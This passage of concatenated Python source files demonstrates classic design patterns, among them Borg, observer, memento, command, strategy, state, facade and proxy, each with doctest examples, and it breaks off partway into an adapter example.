https://github.com/onetwopunch/pythonDbTemplate/blob/master/database.py *References: - https://fkromer.github.io/python-pattern-references/design/#singleton - https://learning.oreilly.com/library/view/python-cookbook/0596001673/ch05s23.html - http://www.aleax.it/5ep.html *TL;DR Provides singleton-like behavior sharing state between instances. """ from typing import Dict class Borg: _shared_state: Dict[str, str] = {} def __init__(self) -> None: self.__dict__ = self._shared_state class YourBorg(Borg): def __init__(self, state: str = None) -> None: super().__init__() if state: self.state = state else: # initiate the first instance with default state if not hasattr(self, "state"): self.state = "Init" def __str__(self) -> str: return self.state def main(): """ >>> rm1 = YourBorg() >>> rm2 = YourBorg() >>> rm1.state = 'Idle' >>> rm2.state = 'Running' >>> print('rm1: {0}'.format(rm1)) rm1: Running >>> print('rm2: {0}'.format(rm2)) rm2: Running # When the `state` attribute is modified from instance `rm2`, # the value of `state` in instance `rm1` also changes >>> rm2.state = 'Zombie' >>> print('rm1: {0}'.format(rm1)) rm1: Zombie >>> print('rm2: {0}'.format(rm2)) rm2: Zombie # Even though `rm1` and `rm2` share attributes, the instances are not the same >>> rm1 is rm2 False # New instances also get the same shared state >>> rm3 = YourBorg() >>> print('rm1: {0}'.format(rm1)) rm1: Zombie >>> print('rm2: {0}'.format(rm2)) rm2: Zombie >>> print('rm3: {0}'.format(rm3)) rm3: Zombie # A new instance can explicitly change the state during creation >>> rm4 = YourBorg('Running') >>> print('rm4: {0}'.format(rm4)) rm4: Running # Existing instances reflect that change as well >>> print('rm3: {0}'.format(rm3)) rm3: Running """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/observer.py """ http://code.activestate.com/recipes/131499-observer-pattern/ *TL;DR Maintains a list of dependents and notifies them of any state changes. *Examples in Python ecosystem: Django Signals: https://docs.djangoproject.com/en/3.1/topics/signals/ Flask Signals: https://flask.palletsprojects.com/en/1.1.x/signals/ """ from __future__ import annotations from contextlib import suppress from typing import Protocol # define a generic observer type class Observer(Protocol): def update(self, subject: Subject) -> None: pass class Subject: def __init__(self) -> None: self._observers: list[Observer] = [] def attach(self, observer: Observer) -> None: if observer not in self._observers: self._observers.append(observer) def detach(self, observer: Observer) -> None: with suppress(ValueError): self._observers.remove(observer) def notify(self, modifier: Observer | None = None) -> None: for observer in self._observers: if modifier != observer: observer.update(self) class Data(Subject): def __init__(self, name: str = "") -> None: super().__init__() self.name = name self._data = 0 @property def data(self) -> int: return self._data @data.setter def data(self, value: int) -> None: self._data = value self.notify() class HexViewer: def update(self, subject: Data) -> None: print(f"HexViewer: Subject {subject.name} has data 0x{subject.data:x}") class DecimalViewer: def update(self, subject: Data) -> None: print(f"DecimalViewer: Subject {subject.name} has data {subject.data}") def main(): """ >>> data1 = Data('Data 1') >>> data2 = Data('Data 2') >>> view1 = DecimalViewer() >>> view2 = HexViewer() >>> data1.attach(view1) >>> data1.attach(view2) >>> data2.attach(view2) >>> data2.attach(view1) >>> data1.data = 10 DecimalViewer: Subject Data 1 has data 10 HexViewer: Subject Data 1 has data 0xa >>> data2.data = 15 HexViewer: Subject Data 2 has data 0xf DecimalViewer: Subject Data 2 has data 15 >>> data1.data = 3 DecimalViewer: Subject Data 1 has data 3 HexViewer: Subject Data 1 has data 0x3 >>> data2.data = 5 HexViewer: Subject Data 2 has data 0x5 DecimalViewer: Subject Data 2 has data 5 # Detach HexViewer from data1 and data2 >>> data1.detach(view2) >>> data2.detach(view2) >>> data1.data = 10 DecimalViewer: Subject Data 1 has data 10 >>> data2.data = 15 DecimalViewer: Subject Data 2 has data 15 """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/catalog.py """ A class that uses different static function depending of a parameter passed in init. Note the use of a single dictionary instead of multiple conditions """ __author__ = "Ibrahim Diop <[email protected]>" class Catalog: """catalog of multiple static methods that are executed depending on an init parameter """ def __init__(self, param: str) -> None: # dictionary that will be used to determine which static method is # to be executed but that will be also used to store possible param # value self._static_method_choices = { "param_value_1": self._static_method_1, "param_value_2": self._static_method_2, } # simple test to validate param value if param in self._static_method_choices.keys(): self.param = param else: raise ValueError(f"Invalid Value for Param: {param}") @staticmethod def _static_method_1() -> None: print("executed method 1!") @staticmethod def _static_method_2() -> None: print("executed method 2!") def main_method(self) -> None: """will execute either _static_method_1 or _static_method_2 depending on self.param value """ self._static_method_choices[self.param]() # Alternative implementation for different levels of methods class CatalogInstance: """catalog of multiple methods that are executed depending on an init parameter """ def __init__(self, param: str) -> None: self.x1 = "x1" self.x2 = "x2" # simple test to validate param value if param in self._instance_method_choices: self.param = param else: raise ValueError(f"Invalid Value for Param: {param}") def _instance_method_1(self) -> None: print(f"Value {self.x1}") def _instance_method_2(self) -> None: print(f"Value {self.x2}") _instance_method_choices = { "param_value_1": _instance_method_1, "param_value_2": _instance_method_2, } def main_method(self) -> None: """will execute either _instance_method_1 or _instance_method_2 depending on self.param value """ self._instance_method_choices[self.param].__get__(self)() # type: ignore # type ignore reason: https://github.com/python/mypy/issues/10206 class CatalogClass: """catalog of multiple class methods that are executed depending on an init parameter """ x1 = "x1" x2 = "x2" def __init__(self, param: str) -> None: # simple test to validate param value if param in self._class_method_choices: self.param = param else: raise ValueError(f"Invalid Value for Param: {param}") @classmethod def _class_method_1(cls) -> None: print(f"Value {cls.x1}") @classmethod def _class_method_2(cls) -> None: print(f"Value {cls.x2}") _class_method_choices = { "param_value_1": _class_method_1, "param_value_2": _class_method_2, } def main_method(self): """will execute either _class_method_1 or _class_method_2 depending on self.param value """ self._class_method_choices[self.param].__get__(None, self.__class__)() # type: ignore # type ignore reason: https://github.com/python/mypy/issues/10206 class CatalogStatic: """catalog of multiple static methods that are executed depending on an init parameter """ def __init__(self, param: str) -> None: # simple test to validate param value if param in self._static_method_choices: self.param = param else: raise ValueError(f"Invalid Value for Param: {param}") @staticmethod def _static_method_1() -> None: print("executed method 1!") @staticmethod def _static_method_2() -> None: print("executed method 2!") _static_method_choices = { "param_value_1": _static_method_1, "param_value_2": _static_method_2, } def main_method(self) -> None: """will execute either _static_method_1 or _static_method_2 depending on self.param value """ self._static_method_choices[self.param].__get__(None, self.__class__)() # type: ignore # type ignore reason: https://github.com/python/mypy/issues/10206 def main(): """ >>> test = Catalog('param_value_2') >>> test.main_method() executed method 2! >>> test = CatalogInstance('param_value_1') >>> test.main_method() Value x1 >>> test = CatalogClass('param_value_2') >>> test.main_method() Value x2 >>> test = CatalogStatic('param_value_1') >>> test.main_method() executed method 1! """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/memento.py """ http://code.activestate.com/recipes/413838-memento-closure/ *TL;DR Provides the ability to restore an object to its previous state. """ from copy import copy, deepcopy from typing import Callable, List def memento(obj, deep=False): state = deepcopy(obj.__dict__) if deep else copy(obj.__dict__) def restore(): obj.__dict__.clear() obj.__dict__.update(state) return restore class Transaction: """A transaction guard. This is, in fact, just syntactic sugar around a memento closure. """ deep = False states: List[Callable[[], None]] = [] def __init__(self, deep, *targets): self.deep = deep self.targets = targets self.commit() def commit(self): self.states = [memento(target, self.deep) for target in self.targets] def rollback(self): for a_state in self.states: a_state() def Transactional(method): """Adds transactional semantics to methods. Methods decorated with @Transactional will roll back to entry-state upon exceptions. :param method: The function to be decorated. """ def transaction(obj, *args, **kwargs): state = memento(obj) try: return method(obj, *args, **kwargs) except Exception as e: state() raise e return transaction class NumObj: def __init__(self, value): self.value = value def __repr__(self): return f"<{self.__class__.__name__}: {self.value!r}>" def increment(self): self.value += 1 @Transactional def do_stuff(self): self.value = "1111" # <- invalid value self.increment() # <- will fail and rollback def main(): """ >>> num_obj = NumObj(-1) >>> print(num_obj) <NumObj: -1> >>> a_transaction = Transaction(True, num_obj) >>> try: ... for i in range(3): ... num_obj.increment() ... print(num_obj) ... a_transaction.commit() ... print('-- committed') ... for i in range(3): ... num_obj.increment() ... print(num_obj) ... num_obj.value += 'x' # will fail ... print(num_obj) ... except Exception: ... a_transaction.rollback() ... print('-- rolled back') <NumObj: 0> <NumObj: 1> <NumObj: 2> -- committed <NumObj: 3> <NumObj: 4> <NumObj: 5> -- rolled back >>> print(num_obj) <NumObj: 2> >>> print('-- now doing stuff ...') -- now doing stuff ... >>> try: ... num_obj.do_stuff() ... except Exception: ... print('-> doing stuff failed!') ... import sys ... import traceback ... traceback.print_exc(file=sys.stdout) -> doing stuff failed! Traceback (most recent call last): ... TypeError: ...str...int... >>> print(num_obj) <NumObj: 2> """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/behavioral/command.py """ Command pattern decouples the object invoking a job from the one who knows how to do it. As mentioned in the GoF book, a good example is in menu items. You have a menu that has lots of items. Each item is responsible for doing a special thing and you want your menu item just call the execute method when it is pressed. To achieve this you implement a command object with the execute method for each menu item and pass to it. *About the example We have a menu containing two items. Each item accepts a file name, one hides the file and the other deletes it. Both items have an undo option. Each item is a MenuItem class that accepts the corresponding command as input and executes it's execute method when it is pressed. *TL;DR Object oriented implementation of callback functions. *Examples in Python ecosystem: Django HttpRequest (without execute method): https://docs.djangoproject.com/en/2.1/ref/request-response/#httprequest-objects """ from typing import List, Union class HideFileCommand: """ A command to hide a file given its name """ def __init__(self) -> None: # an array of files hidden, to undo them as needed self._hidden_files: List[str] = [] def execute(self, filename: str) -> None: print(f"hiding {filename}") self._hidden_files.append(filename) def undo(self) -> None: filename = self._hidden_files.pop() print(f"un-hiding {filename}") class DeleteFileCommand: """ A command to delete a file given its name """ def __init__(self) -> None: # an array of deleted files, to undo them as needed self._deleted_files: List[str] = [] def execute(self, filename: str) -> None: print(f"deleting {filename}") self._deleted_files.append(filename) def undo(self) -> None: filename = self._deleted_files.pop() print(f"restoring {filename}") class MenuItem: """ The invoker class. Here it is items in a menu. """ def __init__(self, command: Union[HideFileCommand, DeleteFileCommand]) -> None: self._command = command def on_do_press(self, filename: str) -> None: self._command.execute(filename) def on_undo_press(self) -> None: self._command.undo() def main(): """ >>> item1 = MenuItem(DeleteFileCommand()) >>> item2 = MenuItem(HideFileCommand()) # create a file named `test-file` to work with >>> test_file_name = 'test-file' # deleting `test-file` >>> item1.on_do_press(test_file_name) deleting test-file # restoring `test-file` >>> item1.on_undo_press() restoring test-file # hiding `test-file` >>> item2.on_do_press(test_file_name) hiding test-file # un-hiding `test-file` >>> item2.on_undo_press() un-hiding test-file """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/registry.py from typing import Dict class RegistryHolder(type): REGISTRY: Dict[str, "RegistryHolder"] = {} def __new__(cls, name, bases, attrs): new_cls = type.__new__(cls, name, bases, attrs) """ Here the name of the class is used as key but it could be any class parameter. """ cls.REGISTRY[new_cls.__name__] = new_cls return new_cls @classmethod def get_registry(cls): return dict(cls.REGISTRY) class BaseRegisteredClass(metaclass=RegistryHolder): """ Any class that will inherits from BaseRegisteredClass will be included inside the dict RegistryHolder.REGISTRY, the key being the name of the class and the associated value, the class itself. """ def main(): """ Before subclassing >>> sorted(RegistryHolder.REGISTRY) ['BaseRegisteredClass'] >>> class ClassRegistree(BaseRegisteredClass): ... def __init__(self, *args, **kwargs): ... pass After subclassing >>> sorted(RegistryHolder.REGISTRY) ['BaseRegisteredClass', 'ClassRegistree'] """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/behavioral/mediator.py """ https://www.djangospin.com/design-patterns-python/mediator/ Objects in a system communicate through a Mediator instead of directly with each other. This reduces the dependencies between communicating objects, thereby reducing coupling. *TL;DR Encapsulates how a set of objects interact. """ from __future__ import annotations class ChatRoom: """Mediator class""" def display_message(self, user: User, message: str) -> None: print(f"[{user} says]: {message}") class User: """A class whose instances want to interact with each other""" def __init__(self, name: str) -> None: self.name = name self.chat_room = ChatRoom() def say(self, message: str) -> None: self.chat_room.display_message(self, message) def __str__(self) -> str: return self.name def main(): """ >>> molly = User('Molly') >>> mark = User('Mark') >>> ethan = User('Ethan') >>> molly.say("Hi Team! Meeting at 3 PM today.") [Molly says]: Hi Team! Meeting at 3 PM today. >>> mark.say("Roger that!") [Mark says]: Roger that! >>> ethan.say("Alright.") [Ethan says]: Alright. """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/__init__.py File: patterns/behavioral/strategy.py """ *What is this pattern about? Define a family of algorithms, encapsulate each one, and make them interchangeable. Strategy lets the algorithm vary independently from clients that use it. *TL;DR Enables selecting an algorithm at runtime. """ from __future__ import annotations from typing import Callable class DiscountStrategyValidator: # Descriptor class for check perform @staticmethod def validate(obj: Order, value: Callable) -> bool: try: if obj.price - value(obj) < 0: raise ValueError( f"Discount cannot be applied due to negative price resulting. {value.__name__}" ) except ValueError as ex: print(str(ex)) return False else: return True def __set_name__(self, owner, name: str) -> None: self.private_name = f"_{name}" def __set__(self, obj: Order, value: Callable = None) -> None: if value and self.validate(obj, value): setattr(obj, self.private_name, value) else: setattr(obj, self.private_name, None) def __get__(self, obj: object, objtype: type = None): return getattr(obj, self.private_name) class Order: discount_strategy = DiscountStrategyValidator() def __init__(self, price: float, discount_strategy: Callable = None) -> None: self.price: float = price self.discount_strategy = discount_strategy def apply_discount(self) -> float: if self.discount_strategy: discount = self.discount_strategy(self) else: discount = 0 return self.price - discount def __repr__(self) -> str: strategy = getattr(self.discount_strategy, "__name__", None) return f"<Order price: {self.price} with discount strategy: {strategy}>" def ten_percent_discount(order: Order) -> float: return order.price * 0.10 def on_sale_discount(order: Order) -> float: return order.price * 0.25 + 20 def main(): """ >>> order = Order(100, discount_strategy=ten_percent_discount) >>> print(order) <Order price: 100 with discount strategy: ten_percent_discount> >>> print(order.apply_discount()) 90.0 >>> order = Order(100, discount_strategy=on_sale_discount) >>> print(order) <Order price: 100 with discount strategy: on_sale_discount> >>> print(order.apply_discount()) 55.0 >>> order = Order(10, discount_strategy=on_sale_discount) Discount cannot be applied due to negative price resulting. on_sale_discount >>> print(order) <Order price: 10 with discount strategy: None> """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/iterator_alt.py """ Implementation of the iterator pattern using the iterator protocol from Python *TL;DR Traverses a container and accesses the container's elements. """ from __future__ import annotations class NumberWords: """Counts by word numbers, up to a maximum of five""" _WORD_MAP = ( "one", "two", "three", "four", "five", ) def __init__(self, start: int, stop: int) -> None: self.start = start self.stop = stop def __iter__(self) -> NumberWords: # this makes the class an Iterable return self def __next__(self) -> str: # this makes the class an Iterator if self.start > self.stop or self.start > len(self._WORD_MAP): raise StopIteration current = self.start self.start += 1 return self._WORD_MAP[current - 1] # Test the iterator def main(): """ # Counting to two... >>> for number in NumberWords(start=1, stop=2): ... print(number) one two # Counting to five... >>> for number in NumberWords(start=1, stop=5): ... print(number) one two three four five """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/visitor.py """ http://peter-hoffmann.com/2010/extrinsic-visitor-pattern-python-inheritance.html *TL;DR Separates an algorithm from an object structure on which it operates. An interesting recipe could be found in Brian Jones, David Beazley "Python Cookbook" (2013): - "8.21. Implementing the Visitor Pattern" - "8.22. Implementing the Visitor Pattern Without Recursion" *Examples in Python ecosystem: - Python's ast.NodeVisitor: https://github.com/python/cpython/blob/master/Lib/ast.py#L250 which is then being used e.g. in tools like `pyflakes`. - `Black` formatter tool implements it's own: https://github.com/ambv/black/blob/master/black.py#L718 """ class Node: pass class A(Node): pass class B(Node): pass class C(A, B): pass class Visitor: def visit(self, node, *args, **kwargs): meth = None for cls in node.__class__.__mro__: meth_name = "visit_" + cls.__name__ meth = getattr(self, meth_name, None) if meth: break if not meth: meth = self.generic_visit return meth(node, *args, **kwargs) def generic_visit(self, node, *args, **kwargs): print("generic_visit " + node.__class__.__name__) def visit_B(self, node, *args, **kwargs): print("visit_B " + node.__class__.__name__) def main(): """ >>> a, b, c = A(), B(), C() >>> visitor = Visitor() >>> visitor.visit(a) generic_visit A >>> visitor.visit(b) visit_B B >>> visitor.visit(c) visit_B C """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/iterator.py """ http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/ Implementation of the iterator pattern with a generator *TL;DR Traverses a container and accesses the container's elements. """ def count_to(count: int): """Counts by word numbers, up to a maximum of five""" numbers = ["one", "two", "three", "four", "five"] yield from numbers[:count] # Test the generator def count_to_two() -> None: return count_to(2) def count_to_five() -> None: return count_to(5) def main(): """ # Counting to two... >>> for number in count_to_two(): ... print(number) one two # Counting to five... >>> for number in count_to_five(): ... print(number) one two three four five """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/specification.py """ @author: Gordeev Andrey <[email protected]> *TL;DR Provides recombination business logic by chaining together using boolean logic. """ from abc import abstractmethod class Specification: def and_specification(self, candidate): raise NotImplementedError() def or_specification(self, candidate): raise NotImplementedError() def not_specification(self): raise NotImplementedError() @abstractmethod def is_satisfied_by(self, candidate): pass class CompositeSpecification(Specification): @abstractmethod def is_satisfied_by(self, candidate): pass def and_specification(self, candidate): return AndSpecification(self, candidate) def or_specification(self, candidate): return OrSpecification(self, candidate) def not_specification(self): return NotSpecification(self) class AndSpecification(CompositeSpecification): def __init__(self, one, other): self._one: Specification = one self._other: Specification = other def is_satisfied_by(self, candidate): return bool( self._one.is_satisfied_by(candidate) and self._other.is_satisfied_by(candidate) ) class OrSpecification(CompositeSpecification): def __init__(self, one, other): self._one: Specification = one self._other: Specification = other def is_satisfied_by(self, candidate): return bool( self._one.is_satisfied_by(candidate) or self._other.is_satisfied_by(candidate) ) class NotSpecification(CompositeSpecification): def __init__(self, wrapped): self._wrapped: Specification = wrapped def is_satisfied_by(self, candidate): return bool(not self._wrapped.is_satisfied_by(candidate)) class User: def __init__(self, super_user=False): self.super_user = super_user class UserSpecification(CompositeSpecification): def is_satisfied_by(self, candidate): return isinstance(candidate, User) class SuperUserSpecification(CompositeSpecification): def is_satisfied_by(self, candidate): return getattr(candidate, "super_user", False) def main(): """ >>> andrey = User() >>> ivan = User(super_user=True) >>> vasiliy = 'not User instance' >>> root_specification = UserSpecification().and_specification(SuperUserSpecification()) # Is specification satisfied by <name> >>> root_specification.is_satisfied_by(andrey), 'andrey' (False, 'andrey') >>> root_specification.is_satisfied_by(ivan), 'ivan' (True, 'ivan') >>> root_specification.is_satisfied_by(vasiliy), 'vasiliy' (False, 'vasiliy') """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/template.py """ An example of the Template pattern in Python *TL;DR Defines the skeleton of a base algorithm, deferring definition of exact steps to subclasses. *Examples in Python ecosystem: Django class based views: https://docs.djangoproject.com/en/2.1/topics/class-based-views/ """ def get_text() -> str: return "plain-text" def get_pdf() -> str: return "pdf" def get_csv() -> str: return "csv" def convert_to_text(data: str) -> str: print("[CONVERT]") return f"{data} as text" def saver() -> None: print("[SAVE]") def template_function(getter, converter=False, to_save=False) -> None: data = getter() print(f"Got `{data}`") if len(data) <= 3 and converter: data = converter(data) else: print("Skip conversion") if to_save: saver() print(f"`{data}` was processed") def main(): """ >>> template_function(get_text, to_save=True) Got `plain-text` Skip conversion [SAVE] `plain-text` was processed >>> template_function(get_pdf, converter=convert_to_text) Got `pdf` [CONVERT] `pdf as text` was processed >>> template_function(get_csv, to_save=True) Got `csv` Skip conversion [SAVE] `csv` was processed """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/chain_of_responsibility.py """ *What is this pattern about? The Chain of responsibility is an object oriented version of the `if ... elif ... elif ... else ...` idiom, with the benefit that the condition–action blocks can be dynamically rearranged and reconfigured at runtime. This pattern aims to decouple the senders of a request from its receivers by allowing request to move through chained receivers until it is handled. Request receiver in simple form keeps a reference to a single successor. As a variation some receivers may be capable of sending requests out in several directions, forming a `tree of responsibility`. *TL;DR Allow a request to pass down a chain of receivers until it is handled. """ from abc import ABC, abstractmethod from typing import Optional, Tuple class Handler(ABC): def __init__(self, successor: Optional["Handler"] = None): self.successor = successor def handle(self, request: int) -> None: """ Handle request and stop. If can't - call next handler in chain. As an alternative you might even in case of success call the next handler. """ res = self.check_range(request) if not res and self.successor: self.successor.handle(request) @abstractmethod def check_range(self, request: int) -> Optional[bool]: """Compare passed value to predefined interval""" class ConcreteHandler0(Handler): """Each handler can be different. Be simple and static... """ @staticmethod def check_range(request: int) -> Optional[bool]: if 0 <= request < 10: print(f"request {request} handled in handler 0") return True return None class ConcreteHandler1(Handler): """... With it's own internal state""" start, end = 10, 20 def check_range(self, request: int) -> Optional[bool]: if self.start <= request < self.end: print(f"request {request} handled in handler 1") return True return None class ConcreteHandler2(Handler): """... With helper methods.""" def check_range(self, request: int) -> Optional[bool]: start, end = self.get_interval_from_db() if start <= request < end: print(f"request {request} handled in handler 2") return True return None @staticmethod def get_interval_from_db() -> Tuple[int, int]: return (20, 30) class FallbackHandler(Handler): @staticmethod def check_range(request: int) -> Optional[bool]: print(f"end of chain, no handler for {request}") return False def main(): """ >>> h0 = ConcreteHandler0() >>> h1 = ConcreteHandler1() >>> h2 = ConcreteHandler2(FallbackHandler()) >>> h0.successor = h1 >>> h1.successor = h2 >>> requests = [2, 5, 14, 22, 18, 3, 35, 27, 20] >>> for request in requests: ... h0.handle(request) request 2 handled in handler 0 request 5 handled in handler 0 request 14 handled in handler 1 request 22 handled in handler 2 request 18 handled in handler 1 request 3 handled in handler 0 end of chain, no handler for 35 request 27 handled in handler 2 request 20 handled in handler 2 """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/behavioral/publish_subscribe.py """ Reference: http://www.slideshare.net/ishraqabd/publish-subscribe-model-overview-13368808 Author: https://github.com/HanWenfang """ from __future__ import annotations class Provider: def __init__(self) -> None: self.msg_queue = [] self.subscribers = {} def notify(self, msg: str) -> None: self.msg_queue.append(msg) def subscribe(self, msg: str, subscriber: Subscriber) -> None: self.subscribers.setdefault(msg, []).append(subscriber) def unsubscribe(self, msg: str, subscriber: Subscriber) -> None: self.subscribers[msg].remove(subscriber) def update(self) -> None: for msg in self.msg_queue: for sub in self.subscribers.get(msg, []): sub.run(msg) self.msg_queue = [] class Publisher: def __init__(self, msg_center: Provider) -> None: self.provider = msg_center def publish(self, msg: str) -> None: self.provider.notify(msg) class Subscriber: def __init__(self, name: str, msg_center: Provider) -> None: self.name = name self.provider = msg_center def subscribe(self, msg: str) -> None: self.provider.subscribe(msg, self) def unsubscribe(self, msg: str) -> None: self.provider.unsubscribe(msg, self) def run(self, msg: str) -> None: print(f"{self.name} got {msg}") def main(): """ >>> message_center = Provider() >>> fftv = Publisher(message_center) >>> jim = Subscriber("jim", message_center) >>> jim.subscribe("cartoon") >>> jack = Subscriber("jack", message_center) >>> jack.subscribe("music") >>> gee = Subscriber("gee", message_center) >>> gee.subscribe("movie") >>> vani = Subscriber("vani", message_center) >>> vani.subscribe("movie") >>> vani.unsubscribe("movie") # Note that no one subscribed to `ads` # and that vani changed their mind >>> fftv.publish("cartoon") >>> fftv.publish("music") >>> fftv.publish("ads") >>> fftv.publish("movie") >>> fftv.publish("cartoon") >>> fftv.publish("cartoon") >>> fftv.publish("movie") >>> fftv.publish("blank") >>> message_center.update() jim got cartoon jack got music gee got movie jim got cartoon jim got cartoon gee got movie """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/state.py """ Implementation of the state pattern http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/ *TL;DR Implements state as a derived class of the state pattern interface. Implements state transitions by invoking methods from the pattern's superclass. """ from __future__ import annotations class State: """Base state. This is to share functionality""" def scan(self) -> None: """Scan the dial to the next station""" self.pos += 1 if self.pos == len(self.stations): self.pos = 0 print(f"Scanning... Station is {self.stations[self.pos]} {self.name}") class AmState(State): def __init__(self, radio: Radio) -> None: self.radio = radio self.stations = ["1250", "1380", "1510"] self.pos = 0 self.name = "AM" def toggle_amfm(self) -> None: print("Switching to FM") self.radio.state = self.radio.fmstate class FmState(State): def __init__(self, radio: Radio) -> None: self.radio = radio self.stations = ["81.3", "89.1", "103.9"] self.pos = 0 self.name = "FM" def toggle_amfm(self) -> None: print("Switching to AM") self.radio.state = self.radio.amstate class Radio: """A radio. It has a scan button, and an AM/FM toggle switch.""" def __init__(self) -> None: """We have an AM state and an FM state""" self.amstate = AmState(self) self.fmstate = FmState(self) self.state = self.amstate def toggle_amfm(self) -> None: self.state.toggle_amfm() def scan(self) -> None: self.state.scan() def main(): """ >>> radio = Radio() >>> actions = [radio.scan] * 2 + [radio.toggle_amfm] + [radio.scan] * 2 >>> actions *= 2 >>> for action in actions: ... action() Scanning... Station is 1380 AM Scanning... Station is 1510 AM Switching to FM Scanning... Station is 89.1 FM Scanning... Station is 103.9 FM Scanning... Station is 81.3 FM Scanning... Station is 89.1 FM Switching to AM Scanning... Station is 1250 AM Scanning... Station is 1380 AM """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/chaining_method.py from __future__ import annotations class Person: def __init__(self, name: str) -> None: self.name = name def do_action(self, action: Action) -> Action: print(self.name, action.name, end=" ") return action class Action: def __init__(self, name: str) -> None: self.name = name def amount(self, val: str) -> Action: print(val, end=" ") return self def stop(self) -> None: print("then stop") def main(): """ >>> move = Action('move') >>> person = Person('Jack') >>> person.do_action(move).amount('5m').stop() Jack move 5m then stop """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/fundamental/delegation_pattern.py """ Reference: https://en.wikipedia.org/wiki/Delegation_pattern Author: https://github.com/IuryAlves *TL;DR Allows object composition to achieve the same code reuse as inheritance. """ from __future__ import annotations from typing import Any, Callable class Delegator: """ >>> delegator = Delegator(Delegate()) >>> delegator.p1 123 >>> delegator.p2 Traceback (most recent call last): ... AttributeError: 'Delegate' object has no attribute 'p2' >>> delegator.do_something("nothing") 'Doing nothing' >>> delegator.do_anything() Traceback (most recent call last): ... AttributeError: 'Delegate' object has no attribute 'do_anything' """ def __init__(self, delegate: Delegate) -> None: self.delegate = delegate def __getattr__(self, name: str) -> Any | Callable: attr = getattr(self.delegate, name) if not callable(attr): return attr def wrapper(*args, **kwargs): return attr(*args, **kwargs) return wrapper class Delegate: def __init__(self) -> None: self.p1 = 123 def do_something(self, something: str) -> str: return f"Doing {something}" if __name__ == "__main__": import doctest doctest.testmod() File: patterns/fundamental/__init__.py File: patterns/structural/facade.py """ Example from https://en.wikipedia.org/wiki/Facade_pattern#Python *What is this pattern about? The Facade pattern is a way to provide a simpler unified interface to a more complex system. It provides an easier way to access functions of the underlying system by providing a single entry point. This kind of abstraction is seen in many real life situations. For example, we can turn on a computer by just pressing a button, but in fact there are many procedures and operations done when that happens (e.g., loading programs from disk to memory). In this case, the button serves as an unified interface to all the underlying procedures to turn on a computer. *Where is the pattern used practically? This pattern can be seen in the Python standard library when we use the isdir function. Although a user simply uses this function to know whether a path refers to a directory, the system makes a few operations and calls other modules (e.g., os.stat) to give the result. *References: https://sourcemaking.com/design_patterns/facade https://fkromer.github.io/python-pattern-references/design/#facade http://python-3-patterns-idioms-test.readthedocs.io/en/latest/ChangeInterface.html#facade *TL;DR Provides a simpler unified interface to a complex system. """ # Complex computer parts class CPU: """ Simple CPU representation. """ def freeze(self) -> None: print("Freezing processor.") def jump(self, position: str) -> None: print("Jumping to:", position) def execute(self) -> None: print("Executing.") class Memory: """ Simple memory representation. """ def load(self, position: str, data: str) -> None: print(f"Loading from {position} data: '{data}'.") class SolidStateDrive: """ Simple solid state drive representation. """ def read(self, lba: str, size: str) -> str: return f"Some data from sector {lba} with size {size}" class ComputerFacade: """ Represents a facade for various computer parts. """ def __init__(self): self.cpu = CPU() self.memory = Memory() self.ssd = SolidStateDrive() def start(self): self.cpu.freeze() self.memory.load("0x00", self.ssd.read("100", "1024")) self.cpu.jump("0x00") self.cpu.execute() def main(): """ >>> computer_facade = ComputerFacade() >>> computer_facade.start() Freezing processor. Loading from 0x00 data: 'Some data from sector 100 with size 1024'. Jumping to: 0x00 Executing. """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/structural/proxy.py """ *What is this pattern about? Proxy is used in places where you want to add functionality to a class without changing its interface. The main class is called `Real Subject`. A client should use the proxy or the real subject without any code change, so both must have the same interface. Logging and controlling access to the real subject are some of the proxy pattern usages. *References: https://refactoring.guru/design-patterns/proxy/python/example https://python-3-patterns-idioms-test.readthedocs.io/en/latest/Fronting.html *TL;DR Add functionality or logic (e.g. logging, caching, authorization) to a resource without changing its interface. """ from typing import Union class Subject: """ As mentioned in the document, interfaces of both RealSubject and Proxy should be the same, because the client should be able to use RealSubject or Proxy with no code change. Not all times this interface is necessary. The point is the client should be able to use RealSubject or Proxy interchangeably with no change in code. """ def do_the_job(self, user: str) -> None: raise NotImplementedError() class RealSubject(Subject): """ This is the main job doer. External services like payment gateways can be a good example. """ def do_the_job(self, user: str) -> None: print(f"I am doing the job for {user}") class Proxy(Subject): def __init__(self) -> None: self._real_subject = RealSubject() def do_the_job(self, user: str) -> None: """ logging and controlling access are some examples of proxy usages. """ print(f"[log] Doing the job for {user} is requested.") if user == "admin": self._real_subject.do_the_job(user) else: print("[log] I can do the job just for `admins`.") def client(job_doer: Union[RealSubject, Proxy], user: str) -> None: job_doer.do_the_job(user) def main(): """ >>> proxy = Proxy() >>> real_subject = RealSubject() >>> client(proxy, 'admin') [log] Doing the job for admin is requested. I am doing the job for admin >>> client(proxy, 'anonymous') [log] Doing the job for anonymous is requested. [log] I can do the job just for `admins`. >>> client(real_subject, 'admin') I am doing the job for admin >>> client(real_subject, 'anonymous') I am doing the job for anonymous """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/adapter.py """ *What is this pattern about? The Adapter pattern provides a different interface for a class. We can think about it as a cable adapter that allows you to charge a phone somewhere that has outlets in a different shape. Following this idea, the Adapter pattern is useful to integrate classes that couldn't be integrated due to their incompatible interfaces. *What does this example do? The example has classes that represent entities (Dog, 